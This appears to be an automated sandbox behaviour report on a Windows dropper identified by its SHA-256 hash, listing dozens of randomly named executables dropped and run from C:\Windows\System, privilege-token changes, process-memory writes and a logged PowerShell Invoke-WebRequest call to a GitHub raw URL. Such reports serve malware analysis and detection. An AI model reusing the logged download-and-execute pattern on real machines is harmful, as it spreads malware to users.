File created	C:\Windows\System\jwaYJih.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\NHblyLr.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\JoYIGVm.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\QFktMbB.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\jOPTuwX.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\CnqHRgC.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\PToifyc.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\WBrxbJe.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\FnAfUXH.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\VdUPOPq.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\gkCAWua.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\mSEaVNk.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\gnvpWsO.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\ONOCmeB.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\DWMHGqD.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2076	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
Token: SeLockMemoryPrivilege	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 2076	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	29
PID 2464 wrote to memory of 2076	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	29
PID 2464 wrote to memory of 2076	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	29
PID 2464 wrote to memory of 2920	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	30
PID 2464 wrote to memory of 2920	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	30
PID 2464 wrote to memory of 2920	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	30
PID 2464 wrote to memory of 2060	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	31
PID 2464 wrote to memory of 2060	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	31
PID 2464 wrote to memory of 2060	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	31
PID 2464 wrote to memory of 2592	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	32
PID 2464 wrote to memory of 2592	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	32
PID 2464 wrote to memory of 2592	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	32
PID 2464 wrote to memory of 2776	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	33
PID 2464 wrote to memory of 2776	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	33
PID 2464 wrote to memory of 2776	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	33
PID 2464 wrote to memory of 2532	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	34
PID 2464 wrote to memory of 2532	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	34
PID 2464 wrote to memory of 2532	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	34
PID 2464 wrote to memory of 2504	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	35
PID 2464 wrote to memory of 2504	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	35
PID 2464 wrote to memory of 2504	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	35
PID 2464 wrote to memory of 2612	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	36
PID 2464 wrote to memory of 2612	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	36
PID 2464 wrote to memory of 2612	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	36
PID 2464 wrote to memory of 2892	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	37
PID 2464 wrote to memory of 2892	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	37
PID 2464 wrote to memory of 2892	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	37
PID 2464 wrote to memory of 1628	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	38
PID 2464 wrote to memory of 1628	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	38
PID 2464 wrote to memory of 1628	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	38
PID 2464 wrote to memory of 2372	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	39
PID 2464 wrote to memory of 2372	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	39
PID 2464 wrote to memory of 2372	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	39
PID 2464 wrote to memory of 2484	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	40
PID 2464 wrote to memory of 2484	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	40
PID 2464 wrote to memory of 2484	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	40
PID 2464 wrote to memory of 2472	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	41
PID 2464 wrote to memory of 2472	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	41
PID 2464 wrote to memory of 2472	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	41
PID 2464 wrote to memory of 1244	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	42
PID 2464 wrote to memory of 1244	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	42
PID 2464 wrote to memory of 1244	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	42
PID 2464 wrote to memory of 2728	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	43
PID 2464 wrote to memory of 2728	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	43
PID 2464 wrote to memory of 2728	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	43
PID 2464 wrote to memory of 1648	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	44
PID 2464 wrote to memory of 1648	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	44
PID 2464 wrote to memory of 1648	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	44
PID 2464 wrote to memory of 1904	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	45
PID 2464 wrote to memory of 1904	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	45
PID 2464 wrote to memory of 1904	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	45
PID 2464 wrote to memory of 2272	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	46
PID 2464 wrote to memory of 2272	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	46
PID 2464 wrote to memory of 2272	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	46
PID 2464 wrote to memory of 2340	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	47
PID 2464 wrote to memory of 2340	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	47
PID 2464 wrote to memory of 2340	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	47
PID 2464 wrote to memory of 1572	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	48
PID 2464 wrote to memory of 1572	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	48
PID 2464 wrote to memory of 1572	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	48
PID 2464 wrote to memory of 2300	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	49
PID 2464 wrote to memory of 2300	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	49
PID 2464 wrote to memory of 2300	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	49
PID 2464 wrote to memory of 1268	2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe	50

C:\Users\Admin\AppData\Local\Temp\7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
"C:\Users\Admin\AppData\Local\Temp\7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System\EaXBBVE.exe
  C:\Windows\System\EaXBBVE.exe
  2⤵
  - Executes dropped EXE
  PID:2920
- C:\Windows\System\aWXqJXy.exe
  C:\Windows\System\aWXqJXy.exe
  2⤵
  - Executes dropped EXE
  PID:2060
- C:\Windows\System\tzTKFuh.exe
  C:\Windows\System\tzTKFuh.exe
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Windows\System\NHVklJA.exe
  C:\Windows\System\NHVklJA.exe
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Windows\System\iompald.exe
  C:\Windows\System\iompald.exe
  2⤵
  - Executes dropped EXE
  PID:2532
- C:\Windows\System\BZPtGyh.exe
  C:\Windows\System\BZPtGyh.exe
  2⤵
  - Executes dropped EXE
  PID:2504
- C:\Windows\System\fQnFVux.exe
  C:\Windows\System\fQnFVux.exe
  2⤵
  - Executes dropped EXE
  PID:2612
- C:\Windows\System\jmRacfm.exe
  C:\Windows\System\jmRacfm.exe
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Windows\System\lxUbLAf.exe
  C:\Windows\System\lxUbLAf.exe
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Windows\System\LADnXlj.exe
  C:\Windows\System\LADnXlj.exe
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\System\mLChslX.exe
  C:\Windows\System\mLChslX.exe
  2⤵
  - Executes dropped EXE
  PID:2484
- C:\Windows\System\IIkkfru.exe
  C:\Windows\System\IIkkfru.exe
  2⤵
  - Executes dropped EXE
  PID:2472
- C:\Windows\System\CykyveW.exe
  C:\Windows\System\CykyveW.exe
  2⤵
  - Executes dropped EXE
  PID:1244
- C:\Windows\System\xsEVRjj.exe
  C:\Windows\System\xsEVRjj.exe
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\Windows\System\CjqCOeb.exe
  C:\Windows\System\CjqCOeb.exe
  2⤵
  - Executes dropped EXE
  PID:1648
- C:\Windows\System\wJoCCxG.exe
  C:\Windows\System\wJoCCxG.exe
  2⤵
  - Executes dropped EXE
  PID:1904
- C:\Windows\System\GUIQnQf.exe
  C:\Windows\System\GUIQnQf.exe
  2⤵
  - Executes dropped EXE
  PID:2272
- C:\Windows\System\MzdTcam.exe
  C:\Windows\System\MzdTcam.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\cJLZetJ.exe
  C:\Windows\System\cJLZetJ.exe
  2⤵
  - Executes dropped EXE
  PID:1572
- C:\Windows\System\qjnJgRZ.exe
  C:\Windows\System\qjnJgRZ.exe
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Windows\System\GdqtkPM.exe
  C:\Windows\System\GdqtkPM.exe
  2⤵
  - Executes dropped EXE
  PID:1268
- C:\Windows\System\yQlqDII.exe
  C:\Windows\System\yQlqDII.exe
  2⤵
  - Executes dropped EXE
  PID:2480
- C:\Windows\System\prkZMNS.exe
  C:\Windows\System\prkZMNS.exe
  2⤵
  - Executes dropped EXE
  PID:2040
- C:\Windows\System\HOhyaSX.exe
  C:\Windows\System\HOhyaSX.exe
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Windows\System\ZHmQvQT.exe
  C:\Windows\System\ZHmQvQT.exe
  2⤵
  - Executes dropped EXE
  PID:2092
- C:\Windows\System\zqzEOyO.exe
  C:\Windows\System\zqzEOyO.exe
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Windows\System\timZIcm.exe
  C:\Windows\System\timZIcm.exe
  2⤵
  - Executes dropped EXE
  PID:672
- C:\Windows\System\KwXXZRW.exe
  C:\Windows\System\KwXXZRW.exe
  2⤵
  - Executes dropped EXE
  PID:980
- C:\Windows\System\vhuEPhy.exe
  C:\Windows\System\vhuEPhy.exe
  2⤵
  - Executes dropped EXE
  PID:584
- C:\Windows\System\XZCHTbA.exe
  C:\Windows\System\XZCHTbA.exe
  2⤵
  - Executes dropped EXE
  PID:1548
- C:\Windows\System\iTZyXPr.exe
  C:\Windows\System\iTZyXPr.exe
  2⤵
  - Executes dropped EXE
  PID:2716
- C:\Windows\System\wuYFbxe.exe
  C:\Windows\System\wuYFbxe.exe
  2⤵
  - Executes dropped EXE
  PID:1104
- C:\Windows\System\osIJvkP.exe
  C:\Windows\System\osIJvkP.exe
  2⤵
  - Executes dropped EXE
  PID:452
- C:\Windows\System\TlVPmXl.exe
  C:\Windows\System\TlVPmXl.exe
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Windows\System\cHImErO.exe
  C:\Windows\System\cHImErO.exe
  2⤵
  - Executes dropped EXE
  PID:3048
- C:\Windows\System\eFrPsNN.exe
  C:\Windows\System\eFrPsNN.exe
  2⤵
  - Executes dropped EXE
  PID:1220
- C:\Windows\System\IsOHpyf.exe
  C:\Windows\System\IsOHpyf.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Windows\System\HmvPuqb.exe
  C:\Windows\System\HmvPuqb.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\System\OITUsMF.exe
  C:\Windows\System\OITUsMF.exe
  2⤵
  - Executes dropped EXE
  PID:756
- C:\Windows\System\lkTQmTX.exe
  C:\Windows\System\lkTQmTX.exe
  2⤵
  - Executes dropped EXE
  PID:1616
- C:\Windows\System\pEgkCcu.exe
  C:\Windows\System\pEgkCcu.exe
  2⤵
  - Executes dropped EXE
  PID:992
- C:\Windows\System\BsOykvl.exe
  C:\Windows\System\BsOykvl.exe
  2⤵
  - Executes dropped EXE
  PID:1012
- C:\Windows\System\WFaKuOu.exe
  C:\Windows\System\WFaKuOu.exe
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Windows\System\psXnjZK.exe
  C:\Windows\System\psXnjZK.exe
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Windows\System\AurXmOe.exe
  C:\Windows\System\AurXmOe.exe
  2⤵
  - Executes dropped EXE
  PID:852
- C:\Windows\System\pJVfDXk.exe
  C:\Windows\System\pJVfDXk.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\czMQTwK.exe
  C:\Windows\System\czMQTwK.exe
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Windows\System\wquzgiN.exe
  C:\Windows\System\wquzgiN.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\cBkEsFK.exe
  C:\Windows\System\cBkEsFK.exe
  2⤵
  - Executes dropped EXE
  PID:2884
- C:\Windows\System\gMgBGUk.exe
  C:\Windows\System\gMgBGUk.exe
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\Windows\System\PNrPJhb.exe
  C:\Windows\System\PNrPJhb.exe
  2⤵
  - Executes dropped EXE
  PID:2832
- C:\Windows\System\bhBxPcY.exe
  C:\Windows\System\bhBxPcY.exe
  2⤵
  - Executes dropped EXE
  PID:1560
- C:\Windows\System\QClkpOa.exe
  C:\Windows\System\QClkpOa.exe
  2⤵
  - Executes dropped EXE
  PID:2044
- C:\Windows\System\TswAKPL.exe
  C:\Windows\System\TswAKPL.exe
  2⤵
  - Executes dropped EXE
  PID:1304
- C:\Windows\System\OLJRwLi.exe
  C:\Windows\System\OLJRwLi.exe
  2⤵
  - Executes dropped EXE
  PID:2760
- C:\Windows\System\wipiEAH.exe
  C:\Windows\System\wipiEAH.exe
  2⤵
  PID:404
- C:\Windows\System\ggSDOFo.exe
  C:\Windows\System\ggSDOFo.exe
  2⤵
  - Executes dropped EXE
  PID:1264
- C:\Windows\System\tDfarls.exe
  C:\Windows\System\tDfarls.exe
  2⤵
  PID:2324
- C:\Windows\System\NFTqNFl.exe
  C:\Windows\System\NFTqNFl.exe
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Windows\System\vyKEJrb.exe
  C:\Windows\System\vyKEJrb.exe
  2⤵
  PID:1600
- C:\Windows\System\psqGNbt.exe
  C:\Windows\System\psqGNbt.exe
  2⤵
  - Executes dropped EXE
  PID:2572
- C:\Windows\System\QiVWiWM.exe
  C:\Windows\System\QiVWiWM.exe
  2⤵
  PID:2536
- C:\Windows\System\AGuMbrL.exe
  C:\Windows\System\AGuMbrL.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\System\wBsieah.exe
  C:\Windows\System\wBsieah.exe
  2⤵
  PID:2456
- C:\Windows\System\yCLygwY.exe
  C:\Windows\System\yCLygwY.exe
  2⤵
  - Executes dropped EXE
  PID:2852
- C:\Windows\System\EVOMkbP.exe
  C:\Windows\System\EVOMkbP.exe
  2⤵
  PID:1552
- C:\Windows\System\rRgufhv.exe
  C:\Windows\System\rRgufhv.exe
  2⤵
  - Executes dropped EXE
  PID:848
- C:\Windows\System\RPcjymV.exe
  C:\Windows\System\RPcjymV.exe
  2⤵
  PID:1948
- C:\Windows\System\rgosrQy.exe
  C:\Windows\System\rgosrQy.exe
  2⤵
  - Executes dropped EXE
  PID:1900
- C:\Windows\System\rmKOYYI.exe
  C:\Windows\System\rmKOYYI.exe
  2⤵
  PID:2312
- C:\Windows\System\zbhAtgs.exe
  C:\Windows\System\zbhAtgs.exe
  2⤵
  - Executes dropped EXE
  PID:2476
- C:\Windows\System\guOFzZM.exe
  C:\Windows\System\guOFzZM.exe
  2⤵
  PID:2624
- C:\Windows\System\hQcvFfl.exe
  C:\Windows\System\hQcvFfl.exe
  2⤵
  - Executes dropped EXE
  PID:912
- C:\Windows\System\Ijwumfs.exe
  C:\Windows\System\Ijwumfs.exe
  2⤵
  PID:2740
- C:\Windows\System\Brodvqv.exe
  C:\Windows\System\Brodvqv.exe
  2⤵
  PID:2888
- C:\Windows\System\NbUCIDr.exe
  C:\Windows\System\NbUCIDr.exe
  2⤵
  PID:1416
- C:\Windows\System\GUgMRel.exe
  C:\Windows\System\GUgMRel.exe
  2⤵
  PID:2672
- C:\Windows\System\xjSoxzQ.exe
  C:\Windows\System\xjSoxzQ.exe
  2⤵
  PID:1740
- C:\Windows\System\kIKlWyy.exe
  C:\Windows\System\kIKlWyy.exe
  2⤵
  PID:1664
- C:\Windows\System\cFLcYoo.exe
  C:\Windows\System\cFLcYoo.exe
  2⤵
  PID:2296
- C:\Windows\System\LgHAGme.exe
  C:\Windows\System\LgHAGme.exe
  2⤵
  PID:2236
- C:\Windows\System\VxIORMr.exe
  C:\Windows\System\VxIORMr.exe
  2⤵
  PID:2784
- C:\Windows\System\QIOgSft.exe
  C:\Windows\System\QIOgSft.exe
  2⤵
  PID:1124
- C:\Windows\System\QVPUTDY.exe
  C:\Windows\System\QVPUTDY.exe
  2⤵
  PID:988
- C:\Windows\System\LPbwKKg.exe
  C:\Windows\System\LPbwKKg.exe
  2⤵
  PID:2204
- C:\Windows\System\FxzldFr.exe
  C:\Windows\System\FxzldFr.exe
  2⤵
  PID:908
- C:\Windows\System\OTiHJfe.exe
  C:\Windows\System\OTiHJfe.exe
  2⤵
  PID:2608
- C:\Windows\System\FhOjCmh.exe
  C:\Windows\System\FhOjCmh.exe
  2⤵
  PID:2932
- C:\Windows\System\qEivyDS.exe
  C:\Windows\System\qEivyDS.exe
  2⤵
  PID:2748
- C:\Windows\System\NdZQLXx.exe
  C:\Windows\System\NdZQLXx.exe
  2⤵
  PID:2516
- C:\Windows\System\VKUnwnL.exe
  C:\Windows\System\VKUnwnL.exe
  2⤵
  PID:2448
- C:\Windows\System\IgAcoVA.exe
  C:\Windows\System\IgAcoVA.exe
  2⤵
  PID:2100
- C:\Windows\System\dGXahWF.exe
  C:\Windows\System\dGXahWF.exe
  2⤵
  PID:2032
- C:\Windows\System\wCtlsvx.exe
  C:\Windows\System\wCtlsvx.exe
  2⤵
  PID:2104
- C:\Windows\System\QIFwTyi.exe
  C:\Windows\System\QIFwTyi.exe
  2⤵
  PID:2676
- C:\Windows\System\rUiuETb.exe
  C:\Windows\System\rUiuETb.exe
  2⤵
  PID:2688
- C:\Windows\System\vDsdtfT.exe
  C:\Windows\System\vDsdtfT.exe
  2⤵
  PID:2628
- C:\Windows\System\MkxtGYo.exe
  C:\Windows\System\MkxtGYo.exe
  2⤵
  PID:1908
- C:\Windows\System\FcPbSOD.exe
  C:\Windows\System\FcPbSOD.exe
  2⤵
  PID:1932
- C:\Windows\System\oDWZrWc.exe
  C:\Windows\System\oDWZrWc.exe
  2⤵
  PID:2800
- C:\Windows\System\OZDcpsg.exe
  C:\Windows\System\OZDcpsg.exe
  2⤵
  PID:784
- C:\Windows\System\bBDjWQM.exe
  C:\Windows\System\bBDjWQM.exe
  2⤵
  PID:900
- C:\Windows\System\GoAUMRT.exe
  C:\Windows\System\GoAUMRT.exe
  2⤵
  PID:2128
- C:\Windows\System\RAOAZen.exe
  C:\Windows\System\RAOAZen.exe
  2⤵
  PID:2984
- C:\Windows\System\FQztJVE.exe
  C:\Windows\System\FQztJVE.exe
  2⤵
  PID:2816
- C:\Windows\System\CYjmkxT.exe
  C:\Windows\System\CYjmkxT.exe
  2⤵
  PID:2176
- C:\Windows\System\CirobhO.exe
  C:\Windows\System\CirobhO.exe
  2⤵
  PID:2828
- C:\Windows\System\FYaNFKP.exe
  C:\Windows\System\FYaNFKP.exe
  2⤵
  PID:2632
- C:\Windows\System\QMFdPyH.exe
  C:\Windows\System\QMFdPyH.exe
  2⤵
  PID:1896
- C:\Windows\System\NJiYAhc.exe
  C:\Windows\System\NJiYAhc.exe
  2⤵
  PID:2228
- C:\Windows\System\seJenof.exe
  C:\Windows\System\seJenof.exe
  2⤵
  PID:308
- C:\Windows\System\gIoaQzT.exe
  C:\Windows\System\gIoaQzT.exe
  2⤵
  PID:2764
- C:\Windows\System\cPnPWvb.exe
  C:\Windows\System\cPnPWvb.exe
  2⤵
  PID:1980
- C:\Windows\System\gedEKaT.exe
  C:\Windows\System\gedEKaT.exe
  2⤵
  PID:2416
- C:\Windows\System\LLjiiXl.exe
  C:\Windows\System\LLjiiXl.exe
  2⤵
  PID:2068
- C:\Windows\System\CmyLhac.exe
  C:\Windows\System\CmyLhac.exe
  2⤵
  PID:1496
- C:\Windows\System\WWZZYoz.exe
  C:\Windows\System\WWZZYoz.exe
  2⤵
  PID:1508
- C:\Windows\System\bUDPDDv.exe
  C:\Windows\System\bUDPDDv.exe
  2⤵
  PID:2792
- C:\Windows\System\Pjqcyqp.exe
  C:\Windows\System\Pjqcyqp.exe
  2⤵
  PID:2972
- C:\Windows\System\kNzrLAr.exe
  C:\Windows\System\kNzrLAr.exe
  2⤵
  PID:1320
- C:\Windows\System\mqMACFV.exe
  C:\Windows\System\mqMACFV.exe
  2⤵
  PID:2944
- C:\Windows\System\THVBNRn.exe
  C:\Windows\System\THVBNRn.exe
  2⤵
  PID:2540
- C:\Windows\System\eztaAfu.exe
  C:\Windows\System\eztaAfu.exe
  2⤵
  PID:1940
- C:\Windows\System\oWReYll.exe
  C:\Windows\System\oWReYll.exe
  2⤵
  PID:2200
- C:\Windows\System\Vkgdnor.exe
  C:\Windows\System\Vkgdnor.exe
  2⤵
  PID:1152
- C:\Windows\System\FcCaYIc.exe
  C:\Windows\System\FcCaYIc.exe
  2⤵
  PID:304
- C:\Windows\System\PuOlLmc.exe
  C:\Windows\System\PuOlLmc.exe
  2⤵
  PID:1832
- C:\Windows\System\ENKpqMX.exe
  C:\Windows\System\ENKpqMX.exe
  2⤵
  PID:1516
- C:\Windows\System\jDnCxHe.exe
  C:\Windows\System\jDnCxHe.exe
  2⤵
  PID:2992
- C:\Windows\System\zEIqwQc.exe
  C:\Windows\System\zEIqwQc.exe
  2⤵
  PID:2616
- C:\Windows\System\HagjYdF.exe
  C:\Windows\System\HagjYdF.exe
  2⤵
  PID:2824
- C:\Windows\System\RzbwgfJ.exe
  C:\Windows\System\RzbwgfJ.exe
  2⤵
  PID:2492
- C:\Windows\System\frkLBUZ.exe
  C:\Windows\System\frkLBUZ.exe
  2⤵
  PID:2420
- C:\Windows\System\houegKS.exe
  C:\Windows\System\houegKS.exe
  2⤵
  PID:3004
- C:\Windows\System\PrDoqqx.exe
  C:\Windows\System\PrDoqqx.exe
  2⤵
  PID:1524
- C:\Windows\System\nlmhJdr.exe
  C:\Windows\System\nlmhJdr.exe
  2⤵
  PID:2308
- C:\Windows\System\tdRloBC.exe
  C:\Windows\System\tdRloBC.exe
  2⤵
  PID:3064
- C:\Windows\System\yBNMEPe.exe
  C:\Windows\System\yBNMEPe.exe
  2⤵
  PID:2780
- C:\Windows\System\pfYFFgw.exe
  C:\Windows\System\pfYFFgw.exe
  2⤵
  PID:2428
- C:\Windows\System\IPqZDar.exe
  C:\Windows\System\IPqZDar.exe
  2⤵
  PID:1580
- C:\Windows\System\xdIZizE.exe
  C:\Windows\System\xdIZizE.exe
  2⤵
  PID:276
- C:\Windows\System\xgOKrWf.exe
  C:\Windows\System\xgOKrWf.exe
  2⤵
  PID:1608
- C:\Windows\System\ktXPAZg.exe
  C:\Windows\System\ktXPAZg.exe
  2⤵
  PID:2988
- C:\Windows\System\dBVFBTK.exe
  C:\Windows\System\dBVFBTK.exe
  2⤵
  PID:2260
- C:\Windows\System\VJnqTYo.exe
  C:\Windows\System\VJnqTYo.exe
  2⤵
  PID:2796
- C:\Windows\System\ZiyVhTR.exe
  C:\Windows\System\ZiyVhTR.exe
  2⤵
  PID:2404
